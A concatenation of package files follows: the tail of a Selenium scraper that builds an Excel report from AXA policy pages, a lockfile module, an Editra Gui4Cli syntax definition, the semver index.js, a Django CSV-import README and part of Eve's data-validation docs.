                soup = BeautifulSoup(self.browser.page_source, 'lxml')
                file1 = open(self.reportPath+policy+".txt","a",encoding="utf-8")#append mode
                file1.write(soup.prettify())
                file1.close()
                self.downloadPolicyReport(str(policy))
            except Exception as ex:
                self.frame.setStatusLableText(self.stringValue.processException.get().format(str(policy),str(ex)))
                self.logger.writeLogString('AXA',str(policy)+" throws Exception:" + str(ex))
                self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
            finally:
                # Always close the tab and hand the policy to the builder
                # threads, even on failure, so they can finish counting.
                self.frame.setStatusLableText(self.stringValue.processCompleted.get().format(str(policy)))
                self.logger.writeLogString('AXA',str(policy)+" COMPLETED")
                self.frame.setStatusProgresValueByValue(1)
                self.browser.close()
                self.browser.switch_to.window(self.browser.window_handles[0])
                self.buildReportQueue.append(policy)
                self.buildHeaderQueue.append(policy)
                self.frame.setListItemColor(str(policy),self.STATUS_SCRAP_COMPLETE)

    def buildReport(self):
        # Online mode: build content and header from freshly scraped files.
        self.buildReportThread = threading.Thread(target = self.__buildReport)
        self.buildReportThread.start()
        self.buildReportHeaderFullFlow()
        pass

    def buildReportOnly(self):
        # Offline mode: rebuild the report from files under inputPath.
        self.buildReportThread = threading.Thread(target = self.__buildReportOnly)
        self.buildReportThread.start()
        self.buildReportHeaderHalfFlow()
        pass

    def buildReportHeaderFullFlow(self):
        self.buildHeaderThread = threading.Thread(target = self.__buildReportHeaderFullFlow)
        self.buildHeaderThread.start()
        pass

    def buildReportHeaderHalfFlow(self):
        self.buildHeaderThread = threading.Thread(target = self.__buildReportHeaderHalfFlow)
        self.buildHeaderThread.start()
        pass

    def downloadPolicyReport(self, policy):
        """Download the policy PDF if enabled; silently ignores any failure."""
        if not self.downloadReport:
            return
        try:
            self.browser.find_element(By.XPATH,"/html/body/div/div[2]/table/tbody/tr/td[2]/div[1]/div[1]/div[2]/a").click()
            self.browser.switch_to.window(self.browser.window_handles[2])
            self.browser.find_element(By.XPATH,"/html/body/div/div[1]/div[1]/ul/li[2]/a").click()
            #Selenium no build-in check download complete listerner, check by file exist in path
            reportFullPath = self.reportPath+"{0} _ AXA iPro Office.pdf".format(policy)
            while exists(reportFullPath) == False:
                time.sleep(1)
            self.browser.find_element(By.XPATH,"/html/body/div/div[1]/div[1]/ul/li[1]/a").click()
            self.browser.switch_to.window(self.browser.window_handles[1])
        except Exception as ex:
            pass

    def __buildReportHeaderFullFlow(self):
        """Worker: write the header row from the first parsable policy file."""
        self.logger.writeLogString('AXA-HEADER','START BUILD HEADER FULLFLOW')
        policy_iteration = 0
        while policy_iteration < self.maxPolicyListSize:
            for policy in self.buildHeaderQueue:
                self.logger.writeLogString('AXA-HEADER','POLICY NO.:{0}'.format(str(policy)))
                if self.isStopped:
                    return
                try:
                    file = open(self.reportPath+policy+".txt",encoding="utf-8")#append mode
                    #Full Html src
                    soup_all_src = BeautifulSoup(file.read(), 'lxml')
                    file.close()
                    soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
                    soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
                    soup_pb_header = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','labelCol')
                    for col_num, strong_tag in enumerate(soup_pb_header.find_all('td')):
                        self.worksheet.write(0, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
                    #No error when building the header,break all loop and then stop this thread
                    policy_iteration = self.maxPolicyListSize + 1
                    self.logger.writeLogString('AXA-HEADER','BUILD HEADER COMPLETED, BREAK LOOP')
                    break
                except FileNotFoundError as ex:
                    self.logger.writeLogString('AXA-HEADER','FILE NOT FOUND')
                except Exception as ex:
                    self.logger.writeLogString('AXA-HEADER','EXCEPTION:'+str(ex))
                finally:
                    policy_iteration = policy_iteration + 1
                    if policy in self.buildHeaderQueue:
                        self.buildHeaderQueue.remove(policy)
            else:
                # Queue currently empty: wait for the scraper to feed it.
                time.sleep(1)

    def __buildReportHeaderHalfFlow(self):
        """Worker: offline variant reading saved files from inputPath."""
        self.logger.writeLogString('AXA-HEADER','START BUILD HEADER HALFFLOW')
        for policy in self.policyList:
            self.logger.writeLogString('AXA-HEADER','POLICY NO.:{0}'.format(str(policy)))
            if self.isStopped:
                return
            try:
                file = open(self.inputPath+policy+".txt",encoding="utf-8")#append mode
                #Full Html src
                soup_all_src = BeautifulSoup(file.read(), 'lxml')
                file.close()
                soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
                soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
                soup_pb_header = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','labelCol')
                for col_num, strong_tag in enumerate(soup_pb_header.find_all('td')):
                    self.worksheet.write(0, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
                #No error when building the header,break all loop and then stop this thread
                self.logger.writeLogString('AXA-HEADER','BUILD HEADER COMPLETED, BREAK LOOP')
                break
            except FileNotFoundError as ex:
                self.logger.writeLogString('AXA-HEADER','FILE NOT FOUND')
            except Exception as ex:
                self.logger.writeLogString('AXA-HEADER','EXCEPTION:'+str(ex))

    def __buildReport(self):
        """Worker: fill one worksheet row per policy as files become available."""
        self.logger.writeLogString('AXA-CONTENT','START BUILD REPORT')
        policy_iteration = 0
        while policy_iteration < self.maxPolicyListSize:
            for policy in self.buildReportQueue:
                if self.isStopped:
                    return
                self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),""))
                self.logger.writeLogString('AXA-CONTENT','POLICY NO.:{0}'.format(str(policy)))
                try:
                    self.worksheet.write(policy_iteration+1,0,str(policy))
                    file = open(self.reportPath+policy+".txt",encoding="utf-8")#append mode
                    #Full Html src
                    soup_all_src = BeautifulSoup(file.read(), 'lxml')
                    file.close()
                    soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
                    soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
                    soup_pb_value = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','dataCol')
                    for col_num,strong_tag in enumerate(soup_pb_value.find_all('td')):
                        self.worksheet.write(policy_iteration+1, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
                except FileNotFoundError:
                    self.worksheet.write(policy_iteration+1,1,str(policy)+" not found in this A/C, please check other A/C")
                    self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"not found"))
                    self.logger.writeLogString('AXA-CONTENT','FILE NOT FOUND')
                    self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
                except Exception as ex:
                    self.worksheet.write(policy_iteration+1,1,"System Error ! Please contact IT Support!")
                    self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"failed"))
                    self.logger.writeLogString('AXA-CONTENT','EXCEPTION:'+str(ex))
                    self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
                finally:
                    self.frame.setStatusProgresValueByValue(1)
                    policy_iteration = policy_iteration + 1
                    if policy in self.buildReportQueue:
                        self.buildReportQueue.remove(policy)
                    self.frame.setListItemColor(str(policy),self.STATUS_REPORT_COMPLETE)
            else:
                # Queue currently empty: wait for the scraper to feed it.
                time.sleep(1)
        # Wait for the header thread before closing the workbook.
        self.buildHeaderThread.join()
        self.workbook.close()
        self.frame.setStatusLableText(self.stringValue.completed.get())
        self.logger.writeLogString('AXA-CONTENT','COMPLETED BUILD REPORT')

    def __buildReportOnly(self):
        """Worker: offline report build directly from the policy list."""
        self.logger.writeLogString('AXA-CONTENT','START BUILD REPORT OFFLINE MODE')
        for policy_iteration,policy in enumerate(self.policyList):
            if self.isStopped:
                return
            self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),""))
            self.logger.writeLogString('AXA-CONTENT','POLICY NO.:{0}'.format(str(policy)))
            try:
                self.worksheet.write(policy_iteration+1,0,str(policy))
                file = open(self.inputPath+policy+".txt",encoding="utf-8")#append mode
                #Full Html src
                soup_all_src = BeautifulSoup(file.read(), 'lxml')
                file.close()
                soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
                soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
                soup_pb_value = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','dataCol')
                for col_num,strong_tag in enumerate(soup_pb_value.find_all('td')):
                    self.worksheet.write(policy_iteration+1, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
            except FileNotFoundError:
                self.worksheet.write(policy_iteration+1,1,str(policy)+" not found in this A/C, please check other A/C")
                self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"not found"))
                self.logger.writeLogString('AXA-CONTENT','FILE NOT FOUND')
                self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
            except Exception as ex:
                self.worksheet.write(policy_iteration+1,1,"System Error ! Please contact IT Support!")
                self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"failed"))
                self.logger.writeLogString('AXA-CONTENT','EXCEPTION:'+str(ex))
                self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
            finally:
                self.frame.setStatusProgresValueByValue(2)
                self.frame.setListItemColor(str(policy),self.STATUS_REPORT_COMPLETE)
        self.buildHeaderThread.join()
        self.workbook.close()
        self.frame.setStatusLableText(self.stringValue.completed.get())
        self.logger.writeLogString('AXA-CONTENT','COMPLETED BUILD REPORT OFFLINE MODE')
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/util/lockfile/__init__.py | from __future__ import absolute_import
import sys
import socket
import os
import threading
import time
import urllib
import warnings
import functools
# Work with PEP8 and non-PEP8 versions of threading module.
# Older Pythons expose only the camelCase names; alias the PEP 8 spellings
# so the rest of the package can use one spelling.
if not hasattr(threading, "current_thread"):
    threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, "get_name"):
    threading.Thread.get_name = threading.Thread.getName

# Names exported by ``from lockfile import *``.
__all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked',
           'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock',
           'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile',
           'LockBase', 'locked']
class Error(Exception):
    """
    Base class for other exceptions.

    >>> try:
    ...   raise Error
    ... except Exception:
    ...   pass
    """
    # Root of the lockfile exception hierarchy.
    pass
class LockError(Error):
    """
    Base class for error arising from attempts to acquire the lock.

    >>> try:
    ...   raise LockError
    ... except Error:
    ...   pass
    """
    # Raised (via subclasses) by acquire() implementations.
    pass
class LockTimeout(LockError):
    """Raised when lock creation fails within a user-defined period of time.

    >>> try:
    ...   raise LockTimeout
    ... except LockError:
    ...   pass
    """
    # Corresponds to acquire(timeout > 0) expiring.
    pass
class AlreadyLocked(LockError):
    """Some other thread/process is locking the file.

    >>> try:
    ...   raise AlreadyLocked
    ... except LockError:
    ...   pass
    """
    # Corresponds to acquire(timeout <= 0) on a held lock.
    pass
class LockFailed(LockError):
    """Lock file creation failed for some other reason.

    >>> try:
    ...   raise LockFailed
    ... except LockError:
    ...   pass
    """
    # E.g. permission or filesystem errors while creating the lock file.
    pass
class UnlockError(Error):
    """
    Base class for errors arising from attempts to release the lock.

    >>> try:
    ...   raise UnlockError
    ... except Error:
    ...   pass
    """
    # Raised (via subclasses) by release() implementations.
    pass
class NotLocked(UnlockError):
    """Raised when an attempt is made to unlock an unlocked file.

    >>> try:
    ...   raise NotLocked
    ... except UnlockError:
    ...   pass
    """
    pass
class NotMyLock(UnlockError):
    """Raised when an attempt is made to unlock a file someone else locked.

    >>> try:
    ...   raise NotMyLock
    ... except UnlockError:
    ...   pass
    """
    pass
class LockBase:
    """Base class for platform-specific lock classes.

    Subclasses must implement acquire/release/is_locked/i_am_locking/
    break_lock; this base class provides naming, context-manager support
    and a repr.
    """

    def __init__(self, path, threaded=True, timeout=None):
        """
        >>> lock = LockBase('somefile')
        >>> lock = LockBase('somefile', threaded=False)
        """
        self.path = path
        self.lock_file = os.path.abspath(path) + ".lock"
        self.hostname = socket.gethostname()
        self.pid = os.getpid()
        if threaded:
            t = threading.current_thread()
            # Thread objects in Python 2.4 and earlier do not have ident
            # attrs.  Worm around that.
            ident = getattr(t, "ident", hash(t))
            self.tname = "-%x" % (ident & 0xffffffff)
        else:
            self.tname = ""
        dirname = os.path.dirname(self.lock_file)

        # unique name is mostly about the current process, but must
        # also contain the path -- otherwise, two adjacent locked
        # files conflict (one file gets locked, creating lock-file and
        # unique file, the other one gets locked, creating lock-file
        # and overwriting the already existing lock-file, then one
        # gets unlocked, deleting both lock-file and unique file,
        # finally the last lock errors out upon releasing.
        self.unique_name = os.path.join(dirname,
                                        "%s%s.%s%s" % (self.hostname,
                                                       self.tname,
                                                       self.pid,
                                                       hash(self.path)))
        self.timeout = timeout

    def acquire(self, timeout=None):
        """
        Acquire the lock.

        * If timeout is omitted (or None), wait forever trying to lock the
          file.

        * If timeout > 0, try to acquire the lock for that many seconds.  If
          the lock period expires and the file is still locked, raise
          LockTimeout.

        * If timeout <= 0, raise AlreadyLocked immediately if the file is
          already locked.
        """
        # BUGFIX: the original raised via the NotImplemented singleton,
        # which is not callable and produced a TypeError instead of the
        # intended NotImplementedError (same below).
        raise NotImplementedError("implement in subclass")

    def release(self):
        """
        Release the lock.

        If the file is not locked, raise NotLocked.
        """
        raise NotImplementedError("implement in subclass")

    def is_locked(self):
        """
        Tell whether or not the file is locked.
        """
        raise NotImplementedError("implement in subclass")

    def i_am_locking(self):
        """
        Return True if this object is locking the file.
        """
        raise NotImplementedError("implement in subclass")

    def break_lock(self):
        """
        Remove a lock.  Useful if a locking thread failed to unlock.
        """
        raise NotImplementedError("implement in subclass")

    def __enter__(self):
        """
        Context manager support.
        """
        self.acquire()
        return self

    def __exit__(self, *_exc):
        """
        Context manager support.
        """
        self.release()

    def __repr__(self):
        return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name,
                                   self.path)
def _fl_helper(cls, mod, *args, **kwds):
    """Shared body of the deprecated *FileLock factory functions.

    Warns that the caller should import from *mod* instead, then
    instantiates *cls* with the caller's arguments.
    """
    warnings.warn("Import from %s module instead of lockfile package" % mod,
                  DeprecationWarning, stacklevel=2)
    # This is a bit funky, but it's only for awhile.  The way the unit tests
    # are constructed this function winds up as an unbound method, so it
    # actually takes three args, not two.  We want to toss out self.
    if not isinstance(args[0], str):
        # We are testing, avoid the first arg
        args = args[1:]
    if len(args) == 1 and not kwds:
        # Preserve the historical default of thread-aware locks.
        kwds["threaded"] = True
    return cls(*args, **kwds)
def LinkFileLock(*args, **kwds):
    """Factory function provided for backwards compatibility.

    Do not use in new code.  Instead, import LinkLockFile from the
    lockfile.linklockfile module.
    """
    # Imported lazily so the deprecated name does not pull in the module
    # unless it is actually used.
    from . import linklockfile
    return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile",
                      *args, **kwds)
def MkdirFileLock(*args, **kwds):
    """Factory function provided for backwards compatibility.

    Do not use in new code.  Instead, import MkdirLockFile from the
    lockfile.mkdirlockfile module.
    """
    # Lazy import; see LinkFileLock.
    from . import mkdirlockfile
    return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile",
                      *args, **kwds)
def SQLiteFileLock(*args, **kwds):
    """Factory function provided for backwards compatibility.

    Do not use in new code.  Instead, import SQLiteLockFile from the
    lockfile.sqlitelockfile module.
    """
    # Lazy import; see LinkFileLock.
    from . import sqlitelockfile
    return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile",
                      *args, **kwds)
def locked(path, timeout=None):
    """Decorator which enables locks for decorated function.

    Arguments:
     - path: path for lockfile.
     - timeout (optional): Timeout for acquiring lock.

    Usage:
        @locked('/var/run/myname', timeout=0)
        def myname(...):
            ...
    """
    def _decorator(func):
        @functools.wraps(func)
        def _locked_call(*args, **kwargs):
            # Acquire a fresh lock around every call; release even when the
            # wrapped function raises.
            file_lock = FileLock(path, timeout=timeout)
            file_lock.acquire()
            try:
                return func(*args, **kwargs)
            finally:
                file_lock.release()
        return _locked_call
    return _decorator
# Choose the default lock implementation for this platform: hard links
# where os.link exists (POSIX), a mkdir-based fallback elsewhere.
if hasattr(os, "link"):
    from . import linklockfile as _llf
    LockFile = _llf.LinkLockFile
else:
    from . import mkdirlockfile as _mlf
    LockFile = _mlf.MkdirLockFile

# FileLock and LockFile refer to the same class (compatibility alias).
FileLock = LockFile
/Editra-0.7.20.tar.gz/Editra-0.7.20/src/syntax/_gui4cli.py | __author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: _gui4cli.py 68798 2011-08-20 17:17:05Z CJP $"
__revision__ = "$Revision: 68798 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
#-----------------------------------------------------------------------------#
#---- Keyword Definitions ----#
GLOBALS = (0, "3STATE #ANSI #FIXANSI #FIXOEM #FIXSYS #GUI #SEPARATOR #SYS ABRI "
"ACTIVE ALL ALTSTART APPDATA APPWIN ARRANGE ARROW ASCEND AUTO "
"BACK BC BITBUCKET BL BOLD BORDER BOTTOM BR BUFFERS BUSY BUTTON "
"BUTTONS CAPTION CENTER CHAR CHECK CHILD CLEAN CLEAR CLOSED "
"COLOR COMM COMMON.ALTSTART COMMON.DESKTOP COMMON.FAVORITES "
"COMMON.MENU COMMON.PROGRAMS COMMON.STARTUP COOKIES CROSS CURDIR "
"CURRENT CURSOR DATA DATE DAY DECORATIVE DEF1 DEF2 DEF3 DEF4 "
"DESCEND DESKTOP DIALOG DIR DISABLE DISABLED DISK DISKS DLBEGIN "
"DLCOMPLETE DLGFRAME DOUBLE DRAG DROP DROPLIST DTTM EDIT EDITOR "
"EFFECTS ELLIPSE EMBOSS END ENABLE ENDGUI ENGLISH ENTER ERROR "
"EXISTS EXPLORE EXT FAIL FAVORITES FIELDS FILE FILES FIND FIRST "
"FIXED FIXWIDTH FLAT FNUMBER FOCUS FOREGROUND FORMAT FORWARD "
"FREE FRONT FULL FULLPATH GCDIR GCEXE GCNAME GREEK GRID GUIPATH "
"HEAVY HEIGHT HELP HEX HIDDEN HIDE HIST HISTORY HOME HORIZONTAL "
"HOT HOUR IBEAM ICLEFT INDEX INFO INT INVOKE ITALIC ITEM JULIAN "
"JUSTIFY LARGE LAST LB LBLEFT LC LENGTH LIGHT LINE LINES LMB "
"LMDC LOAD LOADED LOWER LT MAX MAXI MAXBOX MAXIMIZE MEDIUM MENU "
"MINBOX MINI MINIMIZE MINUTE MMB MODERN MONTH MOVE MSEC MULTI "
"NAME NAVCOMPLETE NETCACHE NETHOOD NEW NEWMENU NEXT NO NOADJUST "
"NOBORDER NOERROR NOEXT NOFACE NOFILES NOFOCUS NOFOLDERS NONE "
"NOOPEN NOREFRESH NORESET NORMAL NORTH NOSIZE NOVECTOR NOVRT NOW "
"NOWRAP NUMBER OCTAL OFF OK OKCANCEL ON ONECLICK ONELINE OPEN "
"OVERLAP OWNED PARENT PATH PCPATH PERIOD PERSONAL POLYGON PREFS "
"PREV PREVIOUS PRINT PRINTERS PROGRAMS PROP PROPERTY PULSE "
"QUESTION QUOTE RAGGED RAISED RB RC REC RECENT REFRESH REMOVE "
"REMSIZE RENAME REPORT RESIZE RET RETRY RIGHT RMB ROMAN ROOT "
"ROUNDED ROUTINE ROWS RT SAVE SCALABLE SCREEN SCRIPT SCROLL "
"SEARCH SECOND SELECT SELECTED SELSCRIPT SENDTO SENSITIVE "
"SENTENCE SHELL SHOW SILENT SIMPLE SINGLE SIZE SMALL SMOOTH "
"SOLID SORT START STARTGUI STARTUP STAT0 STATIC STATUS STD STOP "
"STRECH STRIKE SUBCHILD SUBSUB SUNK SUNKEN SWISS SYSMENU TAB "
"TABS TC TEMPLATES TEXT THIN TIME TITLE TL TOGGLE TOOL TOP "
"TOPMOST TOTAL TR TRANS TRANSPARENT TTONLY TYPE UNDERLINE "
"UNFORMAT UNJULIAN UNQUOTE UNSELECT UNSELECTED UPPER USER VALID "
"VARIABLE VCENTER VERSION VERTICAL VIEW WAIT WARN WHEEL WIDTH "
"WINEDGE WORD YEAR YES YESNO YESTOALL YNCANCEL")
EVENTS = (1, "XAREA XBROWSER XBUTTON XCHECKBOX XCOMBO XEDBOX XGROUPBOX XICON "
"XIMAGE XLISTVIEW XMENU XPAN XPROGRESS XRADIO XREBAR XSPLITER "
"XSTATUS XTAB XTEXTBOX XTEXTIN XTOOLBAR XTRACKBAR XTREEVIEW "
"XUPDOWN XAFTER XATTR XBEFORE XENUM XHOTKEY XNOTIFY XONACTIVE "
"XONBROWSER XONCLICK XONCLOSE XONDOUBLECLICK XONDROP XONFAIL "
"XONHELP XONINACTIVE XONKEY XONLMB XONLOAD XONLVCLICK XONLVDIR "
"XONMARK XONMMB XONOPEN XONQUIT XONRELOAD XONRETURN XONRMB "
"XONTEXTIN XONWHEELDOWN XONWHEELUP XPIPE XREQFILE XROUTINE "
"XTBARICON XTIMER XONKEY")
ATTRIBUTES = (2, "ATTR BACKGROUND BUDDY BUFFERS COLORS COLSAVE DATA DBGSTEP DBGVARS "
"DEBUG DEEPTRANS EDITOR ENDGUI ESCAPE FAIL FILTER FONT FRAME "
"GRID HELP ICON ID IXICON KEY LIKE LOCAL LVCOLUMN MAXDATE "
"MAXSIZE MAXTRANS MCINOTIFY MCISIGNAL MENU MINDATE MINSIZE "
"NEXT OUTPUT PAGE PARENT PATH PREFS RBSTYLE RESIZE SAY SHAPE "
"SHOW STARTGUI STYLE TAB TITLE TRANSLATE VARIABLES")
CONTROL = (3, "AND ANDIFEXISTS BREAK CALL CASE DOCASE ELSE ELSEIF ELSEIFEXISTS "
"ENDCASE ENDFOR ENDIF ENDWHILE FOR GO GOSUB GOTO IF IFEXISTS "
"LABEL OR ORIFEXISTS QUIT RETURN STOP WHILE")
COMMANDS = (4, "ADD ADDRESS ADDUNIQUE APPEND APPVAR ASSIGN AUTO BRANCH BROWSER "
"CD CLOSE COMBO COMMAND COPY CREATE CREATELINK CUT CUTVAR DBSUM "
"DCKDEBUG DDEXEC DDPUT DDUSE DEC DEL DELAY DELETE DELVAR EDBOX "
"EMPTYBIN ENUM EXIT EXTRACT FLASH FREEFONT FREEICON GETCLIP "
"GETCOLOR GETFONT GOSUB GUI GUICLOSE GUILOAD GUIOPEN GUIQUIT "
"GUIRENAME GUIWINDOW HTMLHELP IMAGE INC JOINFILE LAUNCH "
"LISTVIEW LOADFONT LOADICON LV LVACTION LVCLIP LVREP LVSEARCH "
"LVSWITCH MAKEDIR MCI MOVE MSGBOX NEWFILE PARSEVAR POPMENU "
"QUICKMENU QUIT RANDOM REGCREATE REGDELETE REGGET REGSET RENAME "
"REPVAR REQFILE RUN SAY SEARCHVAR SEND SET SETATTR SETCLIP "
"SETEVENT SETGADVALUES SETICON SETPOINTER SETVAR SETWINATTR "
"SETWINTITLE SHELL STATUS SYSTEM TERMINATEPROC TEXTFILE "
"TREEVIEW TV UPDATE UPDOWN USE WAIT WINATTR WINDOW")
#---- End Keyword Definitions ----#
#---- Syntax Style Specs ----#
SYNTAX_ITEMS = [(stc.STC_GC_ATTRIBUTE, 'keyword3_style'),
(stc.STC_GC_COMMAND, 'keyword2_style'),
(stc.STC_GC_COMMENTBLOCK, 'comment_style'),
(stc.STC_GC_COMMENTLINE, 'comment_style'),
(stc.STC_GC_CONTROL, 'keyword_style'),
(stc.STC_GC_DEFAULT, 'default_style'),
(stc.STC_GC_EVENT, 'keyword4_style'),
(stc.STC_GC_GLOBAL, 'global_style'),
(stc.STC_GC_OPERATOR, 'operator_style'),
(stc.STC_GC_STRING, 'string_style')]
#---- Extra Properties ----#
FOLD = ("fold", "1")
FOLD_COMP = ("fold.compact", "1")
#-----------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
    """SyntaxData object for Gui4Cli"""

    def __init__(self, langid):
        super(SyntaxData, self).__init__(langid)

        # Setup
        self.SetLexer(stc.STC_LEX_GUI4CLI)

    def GetKeywords(self):
        """Returns Specified Keywords List """
        return [GLOBALS, EVENTS, ATTRIBUTES, CONTROL, COMMANDS]

    def GetSyntaxSpec(self):
        """Syntax Specifications """
        return SYNTAX_ITEMS

    def GetProperties(self):
        """Returns a list of Extra Properties to set

        @note: gui4cli supports folding but it seems to be partially broken,
               so the fold properties are deliberately not returned.
        """
        return list()  # [FOLD, FOLD_COMP]

    def GetCommentPattern(self):
        """Returns a list of characters used to comment a block of code """
        # Fix: the original return carried stray dataset artifact text
        # ("| PypiClean") fused onto the line, breaking the expression.
        return [u'//']
/AyiinXd-0.0.8-cp311-cp311-macosx_10_9_universal2.whl/fipper/node_modules/semver/index.js | const internalRe = require('./internal/re')
const constants = require('./internal/constants')
const SemVer = require('./classes/semver')
const identifiers = require('./internal/identifiers')
const parse = require('./functions/parse')
const valid = require('./functions/valid')
const clean = require('./functions/clean')
const inc = require('./functions/inc')
const diff = require('./functions/diff')
const major = require('./functions/major')
const minor = require('./functions/minor')
const patch = require('./functions/patch')
const prerelease = require('./functions/prerelease')
const compare = require('./functions/compare')
const rcompare = require('./functions/rcompare')
const compareLoose = require('./functions/compare-loose')
const compareBuild = require('./functions/compare-build')
const sort = require('./functions/sort')
const rsort = require('./functions/rsort')
const gt = require('./functions/gt')
const lt = require('./functions/lt')
const eq = require('./functions/eq')
const neq = require('./functions/neq')
const gte = require('./functions/gte')
const lte = require('./functions/lte')
const cmp = require('./functions/cmp')
const coerce = require('./functions/coerce')
const Comparator = require('./classes/comparator')
const Range = require('./classes/range')
const satisfies = require('./functions/satisfies')
const toComparators = require('./ranges/to-comparators')
const maxSatisfying = require('./ranges/max-satisfying')
const minSatisfying = require('./ranges/min-satisfying')
const minVersion = require('./ranges/min-version')
const validRange = require('./ranges/valid')
const outside = require('./ranges/outside')
const gtr = require('./ranges/gtr')
const ltr = require('./ranges/ltr')
const intersects = require('./ranges/intersects')
const simplifyRange = require('./ranges/simplify')
const subset = require('./ranges/subset')
module.exports = {
parse,
valid,
clean,
inc,
diff,
major,
minor,
patch,
prerelease,
compare,
rcompare,
compareLoose,
compareBuild,
sort,
rsort,
gt,
lt,
eq,
neq,
gte,
lte,
cmp,
coerce,
Comparator,
Range,
satisfies,
toComparators,
maxSatisfying,
minSatisfying,
minVersion,
validRange,
outside,
gtr,
ltr,
intersects,
simplifyRange,
subset,
SemVer,
re: internalRe.re,
src: internalRe.src,
tokens: internalRe.t,
SEMVER_SPEC_VERSION: constants.SEMVER_SPEC_VERSION,
RELEASE_TYPES: constants.RELEASE_TYPES,
compareIdentifiers: identifiers.compareIdentifiers,
rcompareIdentifiers: identifiers.rcompareIdentifiers,
} | PypiClean |
/Django-Data-Import-1.0.2.tar.gz/Django-Data-Import-1.0.2/README.md | Django app for import CSV data
===
Adds an "Import" button to the model list page in the Django admin site that allows importing new records into any model.
I took some code from [django-import-export](https://github.com/django-import-export/django-import-export) and adapted it to work with CSV file import.
How to use
---
Follow next steps:
* Install with `pip install django-data-import`
* Add `django_data_import` to `INSTALLED_APPS` in your `settings.py` file
* Edit your `admin.py` file and add `from django_data_import import ImportDataMixin` and add mixin to ModelAdmin like this `class BlogAdmin(ImportDataMixin, admin.ModelAdmin)`
| PypiClean |
/Eve-2.1.0.tar.gz/Eve-2.1.0/docs/validation.rst | .. _validation:
Data Validation
===============
Data validation is provided out-of-the-box. Your configuration includes
a schema definition for every resource managed by the API. Data sent to the API
to be inserted/updated will be validated against the schema, and a resource
will only be updated if validation passes.
.. code-block:: console
$ curl -d '[{"firstname": "bill", "lastname": "clinton"}, {"firstname": "mitt", "lastname": "romney"}]' -H 'Content-Type: application/json' http://myapi/people
HTTP/1.1 201 OK
The response will contain a success/error state for each item provided in the
request:
.. code-block:: javascript
{
"_status": "ERR",
"_error": "Some documents contains errors",
"_items": [
{
"_status": "ERR",
"_issues": {"lastname": "value 'clinton' not unique"}
},
{
"_status": "OK"
}
]
}
In the example above, the first document did not validate so the whole request
has been rejected.
When all documents pass validation and are inserted correctly the response
status is ``201 Created``. If any document fails validation the response status
is ``422 Unprocessable Entity``, or any other error code defined by
``VALIDATION_ERROR_STATUS`` configuration.
For information on how to define documents schema and standard validation
rules, see :ref:`schema`.
Extending Data Validation
-------------------------
Data validation is based on the Cerberus_ validation system and it is therefore
extensible. As a matter of fact, Eve's MongoDB data-layer itself extends
Cerberus validation, implementing the ``unique`` and ``data_relation``
constraints, the ``ObjectId`` data type and the ``decimal128`` on top of
the standard rules.
.. _custom_validation_rules:
Custom Validation Rules
------------------------
Suppose that in your specific and very peculiar use case, a certain value can
only be expressed as an odd integer. You decide to add support for a new
``isodd`` rule to our validation schema. This is how you would implement
that:
.. code-block:: python
from eve.io.mongo import Validator
class MyValidator(Validator):
def _validate_isodd(self, isodd, field, value):
if isodd and not bool(value & 1):
self._error(field, "Value must be an odd number")
app = Eve(validator=MyValidator)
if __name__ == '__main__':
app.run()
By subclassing the base Mongo validator class and then adding a custom
``_validate_<rulename>`` method, you extended the available :ref:`schema`
grammar and now the new custom rule ``isodd`` is available in your schema. You
can now do something like:
.. code-block:: python
'schema': {
'oddity': {
'isodd': True,
'type': 'integer'
}
}
Cerberus and Eve also offer `function-based validation`_ and `type coercion`_,
lightweight alternatives to class-based custom validation.
Custom Data Types
-----------------
You can also add new data types by simply adding ``_validate_type_<typename>``
methods to your subclass. Consider the following snippet from the Eve source
code.
.. code-block:: python
def _validate_type_objectid(self, value):
